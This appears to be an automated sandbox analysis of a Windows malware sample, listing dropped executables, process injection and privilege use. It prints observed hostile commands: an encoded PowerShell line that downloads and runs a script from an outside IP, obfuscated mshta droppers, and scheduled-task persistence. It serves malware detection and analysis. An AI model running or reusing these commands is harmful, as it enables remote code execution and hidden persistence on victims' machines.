f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	C4A.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

bb13f6d819f3b18ebbfe1fb2e0d6c1ed.exeExplorer.EXE

pid	process
1048	bb13f6d819f3b18ebbfe1fb2e0d6c1ed.exe
1048	bb13f6d819f3b18ebbfe1fb2e0d6c1ed.exe
1204	Explorer.EXE
1204	Explorer.EXE
1204	Explorer.EXE
1204	Explorer.EXE
1204	Explorer.EXE
1204	Explorer.EXE
1204	Explorer.EXE
1204	Explorer.EXE
1204	Explorer.EXE
1204	Explorer.EXE
1204	Explorer.EXE
1204	Explorer.EXE
1204	Explorer.EXE
1204	Explorer.EXE
1204	Explorer.EXE
1204	Explorer.EXE
1204	Explorer.EXE
1204	Explorer.EXE
1204	Explorer.EXE
1204	Explorer.EXE
1204	Explorer.EXE
1204	Explorer.EXE
1204	Explorer.EXE
1204	Explorer.EXE
1204	Explorer.EXE
1204	Explorer.EXE
1204	Explorer.EXE
1204	Explorer.EXE
1204	Explorer.EXE
1204	Explorer.EXE
1204	Explorer.EXE
1204	Explorer.EXE
1204	Explorer.EXE
1204	Explorer.EXE
1204	Explorer.EXE
1204	Explorer.EXE
1204	Explorer.EXE
1204	Explorer.EXE
1204	Explorer.EXE
1204	Explorer.EXE
1204	Explorer.EXE
1204	Explorer.EXE
1204	Explorer.EXE
1204	Explorer.EXE
1204	Explorer.EXE
1204	Explorer.EXE
1204	Explorer.EXE
1204	Explorer.EXE
1204	Explorer.EXE
1204	Explorer.EXE
1204	Explorer.EXE
1204	Explorer.EXE
1204	Explorer.EXE
1204	Explorer.EXE
1204	Explorer.EXE
1204	Explorer.EXE
1204	Explorer.EXE
1204	Explorer.EXE
1204	Explorer.EXE
1204	Explorer.EXE
1204	Explorer.EXE
1204	Explorer.EXE

Suspicious behavior: GetForegroundWindowSpam 5 IoCs

Processes:

Explorer.EXEWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid process

1204 Explorer.EXE
1336 WerFault.exe
2004 WerFault.exe
2092 WerFault.exe
2584 WerFault.exe
Suspicious behavior: MapViewOfSection 7 IoCs

Processes:

bb13f6d819f3b18ebbfe1fb2e0d6c1ed.exe1555.exe2C02.exeuethwrujjthwrujjthwruuethwru

pid process

1048 bb13f6d819f3b18ebbfe1fb2e0d6c1ed.exe
432 1555.exe
1872 2C02.exe
2780 uethwru
2892 jjthwru
2464 jjthwru
1280 uethwru

pid	process
1204	Explorer.EXE
1336	WerFault.exe
2004	WerFault.exe
2092	WerFault.exe
2584	WerFault.exe

Suspicious use of AdjustPrivilegeToken 25 IoCs

Processes:

2389.exeExplorer.EXEWerFault.exe7587.exepowershell.exeWerFault.exe115B.exetaskkill.exetaskkill.exeWerFault.exe16D9.exeWerFault.exe

description	pid	process
Token: SeDebugPrivilege	1296	2389.exe
Token: SeShutdownPrivilege	1204	Explorer.EXE
Token: SeDebugPrivilege	1336	WerFault.exe
Token: SeShutdownPrivilege	1204	Explorer.EXE
Token: SeDebugPrivilege	1736	7587.exe
Token: SeDebugPrivilege	860	powershell.exe
Token: SeShutdownPrivilege	1204	Explorer.EXE
Token: SeShutdownPrivilege	1204	Explorer.EXE
Token: SeDebugPrivilege	2004	WerFault.exe
Token: SeShutdownPrivilege	1204	Explorer.EXE
Token: SeDebugPrivilege	1824	115B.exe
Token: SeDebugPrivilege	2020	taskkill.exe
Token: SeDebugPrivilege	2164	taskkill.exe
Token: SeShutdownPrivilege	1204	Explorer.EXE
Token: SeShutdownPrivilege	1204	Explorer.EXE
Token: SeShutdownPrivilege	1204	Explorer.EXE
Token: SeDebugPrivilege	2092	WerFault.exe
Token: SeShutdownPrivilege	1204	Explorer.EXE
Token: SeDebugPrivilege	1604	16D9.exe
Token: SeDebugPrivilege	2584	WerFault.exe
Token: SeShutdownPrivilege	1204	Explorer.EXE
Token: SeShutdownPrivilege	1204	Explorer.EXE
Token: SeShutdownPrivilege	1204	Explorer.EXE
Token: SeShutdownPrivilege	1204	Explorer.EXE
Token: SeShutdownPrivilege	1204	Explorer.EXE

Suspicious use of FindShellTrayWindow 8 IoCs

Processes:

Explorer.EXE

pid process

1204 Explorer.EXE
1204 Explorer.EXE
1204 Explorer.EXE
1204 Explorer.EXE
1204 Explorer.EXE
1204 Explorer.EXE
1204 Explorer.EXE
1204 Explorer.EXE
Suspicious use of SendNotifyMessage 4 IoCs

Processes:

Explorer.EXE

pid process

1204 Explorer.EXE
1204 Explorer.EXE
1204 Explorer.EXE
1204 Explorer.EXE

pid	process
1204	Explorer.EXE
1204	Explorer.EXE
1204	Explorer.EXE
1204	Explorer.EXE
1204	Explorer.EXE
1204	Explorer.EXE
1204	Explorer.EXE
1204	Explorer.EXE

pid	process
1204	Explorer.EXE
1204	Explorer.EXE
1204	Explorer.EXE
1204	Explorer.EXE

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

bb13f6d819f3b18ebbfe1fb2e0d6c1ed.exeExplorer.EXE1555.exe3843.exe6BD5.exe

description	pid	process	target process
PID 320 wrote to memory of 1048	320	bb13f6d819f3b18ebbfe1fb2e0d6c1ed.exe	bb13f6d819f3b18ebbfe1fb2e0d6c1ed.exe
PID 320 wrote to memory of 1048	320	bb13f6d819f3b18ebbfe1fb2e0d6c1ed.exe	bb13f6d819f3b18ebbfe1fb2e0d6c1ed.exe
PID 320 wrote to memory of 1048	320	bb13f6d819f3b18ebbfe1fb2e0d6c1ed.exe	bb13f6d819f3b18ebbfe1fb2e0d6c1ed.exe
PID 320 wrote to memory of 1048	320	bb13f6d819f3b18ebbfe1fb2e0d6c1ed.exe	bb13f6d819f3b18ebbfe1fb2e0d6c1ed.exe
PID 320 wrote to memory of 1048	320	bb13f6d819f3b18ebbfe1fb2e0d6c1ed.exe	bb13f6d819f3b18ebbfe1fb2e0d6c1ed.exe
PID 320 wrote to memory of 1048	320	bb13f6d819f3b18ebbfe1fb2e0d6c1ed.exe	bb13f6d819f3b18ebbfe1fb2e0d6c1ed.exe
PID 320 wrote to memory of 1048	320	bb13f6d819f3b18ebbfe1fb2e0d6c1ed.exe	bb13f6d819f3b18ebbfe1fb2e0d6c1ed.exe
PID 1204 wrote to memory of 1496	1204	Explorer.EXE	1555.exe
PID 1204 wrote to memory of 1496	1204	Explorer.EXE	1555.exe
PID 1204 wrote to memory of 1496	1204	Explorer.EXE	1555.exe
PID 1204 wrote to memory of 1496	1204	Explorer.EXE	1555.exe
PID 1496 wrote to memory of 432	1496	1555.exe	1555.exe
PID 1496 wrote to memory of 432	1496	1555.exe	1555.exe
PID 1496 wrote to memory of 432	1496	1555.exe	1555.exe
PID 1496 wrote to memory of 432	1496	1555.exe	1555.exe
PID 1496 wrote to memory of 432	1496	1555.exe	1555.exe
PID 1496 wrote to memory of 432	1496	1555.exe	1555.exe
PID 1496 wrote to memory of 432	1496	1555.exe	1555.exe
PID 1204 wrote to memory of 1296	1204	Explorer.EXE	2389.exe
PID 1204 wrote to memory of 1296	1204	Explorer.EXE	2389.exe
PID 1204 wrote to memory of 1296	1204	Explorer.EXE	2389.exe
PID 1204 wrote to memory of 1296	1204	Explorer.EXE	2389.exe
PID 1204 wrote to memory of 1872	1204	Explorer.EXE	2C02.exe
PID 1204 wrote to memory of 1872	1204	Explorer.EXE	2C02.exe
PID 1204 wrote to memory of 1872	1204	Explorer.EXE	2C02.exe
PID 1204 wrote to memory of 1872	1204	Explorer.EXE	2C02.exe
PID 1204 wrote to memory of 1100	1204	Explorer.EXE	3843.exe
PID 1204 wrote to memory of 1100	1204	Explorer.EXE	3843.exe
PID 1204 wrote to memory of 1100	1204	Explorer.EXE	3843.exe
PID 1204 wrote to memory of 1100	1204	Explorer.EXE	3843.exe
PID 1204 wrote to memory of 1752	1204	Explorer.EXE	regsvr32.exe
PID 1204 wrote to memory of 1752	1204	Explorer.EXE	regsvr32.exe
PID 1204 wrote to memory of 1752	1204	Explorer.EXE	regsvr32.exe
PID 1204 wrote to memory of 1752	1204	Explorer.EXE	regsvr32.exe
PID 1204 wrote to memory of 1752	1204	Explorer.EXE	regsvr32.exe
PID 1204 wrote to memory of 1044	1204	Explorer.EXE	49C2.exe
PID 1204 wrote to memory of 1044	1204	Explorer.EXE	49C2.exe
PID 1204 wrote to memory of 1044	1204	Explorer.EXE	49C2.exe
PID 1204 wrote to memory of 1044	1204	Explorer.EXE	49C2.exe
PID 1204 wrote to memory of 1416	1204	Explorer.EXE	5651.exe
PID 1204 wrote to memory of 1416	1204	Explorer.EXE	5651.exe
PID 1204 wrote to memory of 1416	1204	Explorer.EXE	5651.exe
PID 1204 wrote to memory of 1416	1204	Explorer.EXE	5651.exe
PID 1204 wrote to memory of 916	1204	Explorer.EXE	6511.exe
PID 1204 wrote to memory of 916	1204	Explorer.EXE	6511.exe
PID 1204 wrote to memory of 916	1204	Explorer.EXE	6511.exe
PID 1204 wrote to memory of 916	1204	Explorer.EXE	6511.exe
PID 1100 wrote to memory of 1336	1100	3843.exe	WerFault.exe
PID 1100 wrote to memory of 1336	1100	3843.exe	WerFault.exe
PID 1100 wrote to memory of 1336	1100	3843.exe	WerFault.exe
PID 1100 wrote to memory of 1336	1100	3843.exe	WerFault.exe
PID 1204 wrote to memory of 832	1204	Explorer.EXE	6BD5.exe
PID 1204 wrote to memory of 832	1204	Explorer.EXE	6BD5.exe
PID 1204 wrote to memory of 832	1204	Explorer.EXE	6BD5.exe
PID 1204 wrote to memory of 832	1204	Explorer.EXE	6BD5.exe
PID 832 wrote to memory of 1148	832	6BD5.exe	cmd.exe
PID 832 wrote to memory of 1148	832	6BD5.exe	cmd.exe
PID 832 wrote to memory of 1148	832	6BD5.exe	cmd.exe
PID 832 wrote to memory of 1148	832	6BD5.exe	cmd.exe
PID 832 wrote to memory of 1612	832	6BD5.exe	cmd.exe
PID 832 wrote to memory of 1612	832	6BD5.exe	cmd.exe
PID 832 wrote to memory of 1612	832	6BD5.exe	cmd.exe
PID 832 wrote to memory of 1612	832	6BD5.exe	cmd.exe
PID 832 wrote to memory of 1872	832	6BD5.exe	cmd.exe

Views/modifies file attributes 1 TTPs 1 IoCs
evasion

Hidden Files and Directories
T1158

Processes:

attrib.exe

pid process

1604 attrib.exe

pid	process
1604	attrib.exe

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Deletes itself
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1204

C:\Users\Admin\AppData\Local\Temp\bb13f6d819f3b18ebbfe1fb2e0d6c1ed.exe
"C:\Users\Admin\AppData\Local\Temp\bb13f6d819f3b18ebbfe1fb2e0d6c1ed.exe"
2⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:320

C:\Users\Admin\AppData\Local\Temp\bb13f6d819f3b18ebbfe1fb2e0d6c1ed.exe
"C:\Users\Admin\AppData\Local\Temp\bb13f6d819f3b18ebbfe1fb2e0d6c1ed.exe"
3⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:1048

C:\Users\Admin\AppData\Local\Temp\1555.exe
C:\Users\Admin\AppData\Local\Temp\1555.exe
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1496

C:\Users\Admin\AppData\Local\Temp\1555.exe
C:\Users\Admin\AppData\Local\Temp\1555.exe
3⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:432

C:\Users\Admin\AppData\Local\Temp\2389.exe
C:\Users\Admin\AppData\Local\Temp\2389.exe
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1296

C:\Users\Admin\AppData\Local\Temp\2C02.exe
C:\Users\Admin\AppData\Local\Temp\2C02.exe
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:1872

C:\Users\Admin\AppData\Local\Temp\3843.exe
C:\Users\Admin\AppData\Local\Temp\3843.exe
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1100

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1100 -s 888
3⤵
- Loads dropped DLL
- Program crash
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:1336

C:\Windows\system32\regsvr32.exe
regsvr32 /s C:\Users\Admin\AppData\Local\Temp\403F.dll
2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Loads dropped DLL
- Suspicious use of SetThreadContext
PID:1752

C:\Users\Admin\AppData\Local\Temp\49C2.exe
C:\Users\Admin\AppData\Local\Temp\49C2.exe
2⤵
- Executes dropped EXE
PID:1044

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1044 -s 528
3⤵
- Loads dropped DLL
- Program crash
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:2004

C:\Users\Admin\AppData\Local\Temp\5651.exe
C:\Users\Admin\AppData\Local\Temp\5651.exe
2⤵
- Executes dropped EXE
PID:1416

C:\Users\Admin\AppData\Local\Temp\6511.exe
C:\Users\Admin\AppData\Local\Temp\6511.exe
2⤵
- Executes dropped EXE
PID:916

C:\Users\Admin\AppData\Local\Temp\6BD5.exe
C:\Users\Admin\AppData\Local\Temp\6BD5.exe
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:832

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c if not exist "C:\Users\Admin\AppData\Local\Temp\afolder" mkdir "C:\Users\Admin\AppData\Local\Temp\afolder"
3⤵
PID:1148

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c if not exist "C:\Users\Admin\AppData\Local\Temp\xtmp" mkdir "C:\Users\Admin\AppData\Local\Temp\xtmp"
3⤵
PID:1612

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c attrib +h C:\Users\Admin\AppData\Local\Temp\xtmp
3⤵
PID:1872

C:\Windows\SysWOW64\attrib.exe
attrib +h C:\Users\Admin\AppData\Local\Temp\xtmp
4⤵
- Views/modifies file attributes
PID:1604

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c echo:0>C:\Users\Admin\AppData\Local\Temp\is64.txt
3⤵
PID:1860

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\is64.bat
3⤵
PID:1652

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c if exist "C:\Users\Admin\AppData\Local\Temp\xtmp\tmp80162.bat" del "C:\Users\Admin\AppData\Local\Temp\xtmp\tmp80162.bat"
3⤵
PID:1416

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c if exist "C:\Users\Admin\AppData\Local\Temp\xtmp\tmp83232.exe" del "C:\Users\Admin\AppData\Local\Temp\xtmp\tmp83232.exe"
3⤵
PID:1288

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\Sysnative\cmd.exe /C C:\Users\Admin\AppData\Local\Temp\xtmp\tmp80162.bat "C:\Users\Admin\AppData\Local\Temp\6BD5.exe"
3⤵
PID:1496

C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C C:\Users\Admin\AppData\Local\Temp\xtmp\tmp80162.bat "C:\Users\Admin\AppData\Local\Temp\6BD5.exe"
4⤵
PID:1032

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -w h -enc IAAkAGEAPQBpAHcAcgAgACcAaAB0AHQAcAA6AC8ALwA0ADUALgA2ADEALgAxADMANwAuADEANwAyAC8AeQByAGQALgBwAHMAMQAnACAALQBVAHMAZQBCAGEAcwBpAGMAUABBAHIAcwBpAG4AZwAgAHwAaQBlAHgA
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:860

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c if exist "C:\Users\Admin\AppData\Local\Temp\xtmp\tmp80162.bat" del "C:\Users\Admin\AppData\Local\Temp\xtmp\tmp80162.bat"
3⤵
PID:1448

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c if exist "C:\Users\Admin\AppData\Local\Temp\xtmp\tmp83232.exe" del "C:\Users\Admin\AppData\Local\Temp\xtmp\tmp83232.exe"
3⤵
PID:1544

C:\Users\Admin\AppData\Local\Temp\7587.exe
C:\Users\Admin\AppData\Local\Temp\7587.exe
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1736

C:\Users\Admin\AppData\Local\Temp\C4A.exe
C:\Users\Admin\AppData\Local\Temp\C4A.exe
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
PID:1952

C:\Users\Admin\AppData\Local\Temp\C4A.exe
C:\Users\Admin\AppData\Local\Temp\C4A.exe
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Modifies system certificate store
PID:1652

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Users\Admin\AppData\Local\94083928-3961-499c-8af9-20acea08c6f8" /deny *S-1-1-0:(OI)(CI)(DE,DC)
4⤵
- Modifies file permissions
PID:1316

C:\Users\Admin\AppData\Local\Temp\C4A.exe
"C:\Users\Admin\AppData\Local\Temp\C4A.exe" --Admin IsNotAutoStart IsNotTask
4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
PID:2404

C:\Users\Admin\AppData\Local\Temp\C4A.exe
"C:\Users\Admin\AppData\Local\Temp\C4A.exe" --Admin IsNotAutoStart IsNotTask
5⤵
- Executes dropped EXE
- Modifies extensions of user files
- Loads dropped DLL
- Modifies system certificate store
PID:2664

C:\Users\Admin\AppData\Local\5e418c06-4743-4669-8730-46e0fb192777\build2.exe
"C:\Users\Admin\AppData\Local\5e418c06-4743-4669-8730-46e0fb192777\build2.exe"
6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2356

C:\Users\Admin\AppData\Local\5e418c06-4743-4669-8730-46e0fb192777\build2.exe
"C:\Users\Admin\AppData\Local\5e418c06-4743-4669-8730-46e0fb192777\build2.exe"
7⤵
- Executes dropped EXE
PID:2396

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2396 -s 876
8⤵
- Loads dropped DLL
- Program crash
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:2584

C:\Users\Admin\AppData\Local\5e418c06-4743-4669-8730-46e0fb192777\build3.exe
"C:\Users\Admin\AppData\Local\5e418c06-4743-4669-8730-46e0fb192777\build3.exe"
6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1196

C:\Users\Admin\AppData\Local\5e418c06-4743-4669-8730-46e0fb192777\build3.exe
"C:\Users\Admin\AppData\Local\5e418c06-4743-4669-8730-46e0fb192777\build3.exe"
7⤵
- Executes dropped EXE
PID:2052

C:\Windows\SysWOW64\schtasks.exe
/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
8⤵
- Creates scheduled task(s)
PID:2428

C:\Users\Admin\AppData\Local\Temp\D83.exe
C:\Users\Admin\AppData\Local\Temp\D83.exe
2⤵
- Executes dropped EXE
PID:1496

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1496 -s 888
3⤵
- Loads dropped DLL
- Program crash
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:2092

C:\Users\Admin\AppData\Local\Temp\115B.exe
C:\Users\Admin\AppData\Local\Temp\115B.exe
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1824

C:\Users\Admin\AppData\Local\Temp\13BD.exe
C:\Users\Admin\AppData\Local\Temp\13BD.exe
2⤵
- Executes dropped EXE
PID:1324

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbSCRIpT: ClosE(CReateobjECT("WscRipT.SHeLl" ).rUn ( "cmD.EXE /q /r tYpe ""C:\Users\Admin\AppData\Local\Temp\13BD.exe"" >MXb89OH1.EXE && StarT MXB89oH1.eXE /poMZbeSahrmSD~4GRjd & iF """"=="""" for %N In ( ""C:\Users\Admin\AppData\Local\Temp\13BD.exe"" ) do taskkill /iM ""%~nXN"" -f " ,0 ,TrUE) )
3⤵
PID:1164

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /q /r tYpe "C:\Users\Admin\AppData\Local\Temp\13BD.exe" >MXb89OH1.EXE&& StarT MXB89oH1.eXE /poMZbeSahrmSD~4GRjd&iF ""=="" for %N In ( "C:\Users\Admin\AppData\Local\Temp\13BD.exe") do taskkill /iM "%~nXN" -f
4⤵
- Loads dropped DLL
PID:1948

C:\Users\Admin\AppData\Local\Temp\MXb89OH1.EXE
MXB89oH1.eXE /poMZbeSahrmSD~4GRjd
5⤵
- Executes dropped EXE
PID:1488

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbSCRIpT: ClosE(CReateobjECT("WscRipT.SHeLl" ).rUn ( "cmD.EXE /q /r tYpe ""C:\Users\Admin\AppData\Local\Temp\MXb89OH1.EXE"" >MXb89OH1.EXE && StarT MXB89oH1.eXE /poMZbeSahrmSD~4GRjd & iF ""/poMZbeSahrmSD~4GRjd""=="""" for %N In ( ""C:\Users\Admin\AppData\Local\Temp\MXb89OH1.EXE"" ) do taskkill /iM ""%~nXN"" -f " ,0 ,TrUE) )
6⤵
- Modifies Internet Explorer settings
PID:1648

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /q /r tYpe "C:\Users\Admin\AppData\Local\Temp\MXb89OH1.EXE" >MXb89OH1.EXE&& StarT MXB89oH1.eXE /poMZbeSahrmSD~4GRjd&iF "/poMZbeSahrmSD~4GRjd"=="" for %N In ( "C:\Users\Admin\AppData\Local\Temp\MXb89OH1.EXE") do taskkill /iM "%~nXN" -f
7⤵
PID:2092

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbScRipt: cLosE (CREateoBJEcT ("wscRiPt.shElL"). ruN ( "cMD /q /r EcHO | SeT /p = ""MZ"" > 5XGGA_QU.T & cOpY /Y /B 5XGGA_QU.t + 7AF4K.HlZ + 8Lma.CS3 + TBFC27.HKL + G2K6.CP+ P1JSBZHT.GQ+ KYb20.A3T YfYnG.AJ & StARt msiexec.exe -y .\YFYnG.AJ ", 0, TRue ) )
6⤵
PID:2416

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /q /r EcHO | SeT /p = "MZ" >5XGGA_QU.T & cOpY /Y /B 5XGGA_QU.t + 7AF4K.HlZ + 8Lma.CS3+ TBFC27.HKL+G2K6.CP+P1JSBZHT.GQ+ KYb20.A3T YfYnG.AJ & StARt msiexec.exe -y .\YFYnG.AJ
7⤵
PID:2780

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" EcHO "
8⤵
PID:2884

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" SeT /p = "MZ" 1>5XGGA_QU.T"
8⤵
PID:2896

C:\Windows\SysWOW64\msiexec.exe
msiexec.exe -y .\YFYnG.AJ
8⤵
- Loads dropped DLL
PID:2972

C:\Windows\SysWOW64\taskkill.exe
taskkill /iM "13BD.exe" -f
5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2020

C:\Users\Admin\AppData\Local\Temp\16D9.exe
C:\Users\Admin\AppData\Local\Temp\16D9.exe
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1604

C:\Users\Admin\AppData\Local\Temp\1CE3.exe
C:\Users\Admin\AppData\Local\Temp\1CE3.exe
2⤵
- Executes dropped EXE
PID:1032

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbsCRipt: ClOSe ( CREAteOBjECt("wSCRipt.SHELl" ).rUN ( "CMd.eXE /q /C CoPy /y ""C:\Users\Admin\AppData\Local\Temp\1CE3.exe"" WZEvHVXQ.exe && StaRt WzEVHVxQ.EXe -pLb1CmBqoD82P_ & If """"== """" for %S In ( ""C:\Users\Admin\AppData\Local\Temp\1CE3.exe"" ) do taskkill /Im ""%~nXS"" /f " , 0 ,TRUe ) )
3⤵
PID:1296

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /q /C CoPy /y "C:\Users\Admin\AppData\Local\Temp\1CE3.exe" WZEvHVXQ.exe&& StaRt WzEVHVxQ.EXe -pLb1CmBqoD82P_ & If ""== "" for %S In ( "C:\Users\Admin\AppData\Local\Temp\1CE3.exe" ) do taskkill /Im "%~nXS" /f
4⤵
- Loads dropped DLL
PID:1820

C:\Users\Admin\AppData\Local\Temp\WZEvHVXQ.exe
WzEVHVxQ.EXe -pLb1CmBqoD82P_
5⤵
- Executes dropped EXE
PID:2120

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbsCRipt: ClOSe ( CREAteOBjECt("wSCRipt.SHELl" ).rUN ( "CMd.eXE /q /C CoPy /y ""C:\Users\Admin\AppData\Local\Temp\WZEvHVXQ.exe"" WZEvHVXQ.exe && StaRt WzEVHVxQ.EXe -pLb1CmBqoD82P_ & If ""-pLb1CmBqoD82P_ ""== """" for %S In ( ""C:\Users\Admin\AppData\Local\Temp\WZEvHVXQ.exe"" ) do taskkill /Im ""%~nXS"" /f " , 0 ,TRUe ) )
6⤵
PID:2236

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /q /C CoPy /y "C:\Users\Admin\AppData\Local\Temp\WZEvHVXQ.exe" WZEvHVXQ.exe&& StaRt WzEVHVxQ.EXe -pLb1CmBqoD82P_ & If "-pLb1CmBqoD82P_ "== "" for %S In ( "C:\Users\Admin\AppData\Local\Temp\WZEvHVXQ.exe" ) do taskkill /Im "%~nXS" /f
7⤵
PID:2344

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vbsCRipt: cloSE (CREaTEoBJeCT ("wscrIPT.SHELL" ). rUN ( "cMd /C ecHo | SEt /p = ""MZ"" > FEi47NU.NZ & cOpY /B /y Fei47NU.NZ + UwAl.DMK + AN~W6DVb.NJy + UZfZ.n5+ygr0BeOV.8~1 + FJPCK8B.S + 8uJKE.T~T ~ql9by.3KS & stART msiexec -y .\~QL9BY.3KS ", 0 ,tRue ) )
6⤵
PID:2644

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C ecHo | SEt /p = "MZ" >FEi47NU.NZ &cOpY /B /y Fei47NU.NZ + UwAl.DMK + AN~W6DVb.NJy+ UZfZ.n5+ygr0BeOV.8~1 + FJPCK8B.S + 8uJKE.T~T ~ql9by.3KS & stART msiexec -y .\~QL9BY.3KS
7⤵
PID:2788

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" ecHo "
8⤵
PID:2860

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" SEt /p = "MZ" 1>FEi47NU.NZ"
8⤵
PID:2872

C:\Windows\SysWOW64\msiexec.exe
msiexec -y .\~QL9BY.3KS
8⤵
- Loads dropped DLL
PID:2920

C:\Windows\SysWOW64\taskkill.exe
taskkill /Im "1CE3.exe" /f
5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2164

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
2⤵
PID:1052

C:\Windows\system32\taskeng.exe
taskeng.exe {5EE0A70D-B562-4977-A3EB-CB3D71BAA413} S-1-5-21-3456797065-1076791440-4146276586-1000:JZCKHXIN\Admin:Interactive:[1]
1⤵
PID:2796

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2848

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
3⤵
- Executes dropped EXE
PID:2788

C:\Windows\SysWOW64\schtasks.exe
/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
4⤵
- Creates scheduled task(s)
PID:2660

C:\Users\Admin\AppData\Roaming\uethwru
C:\Users\Admin\AppData\Roaming\uethwru
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2908

C:\Users\Admin\AppData\Roaming\uethwru
C:\Users\Admin\AppData\Roaming\uethwru
3⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:2780

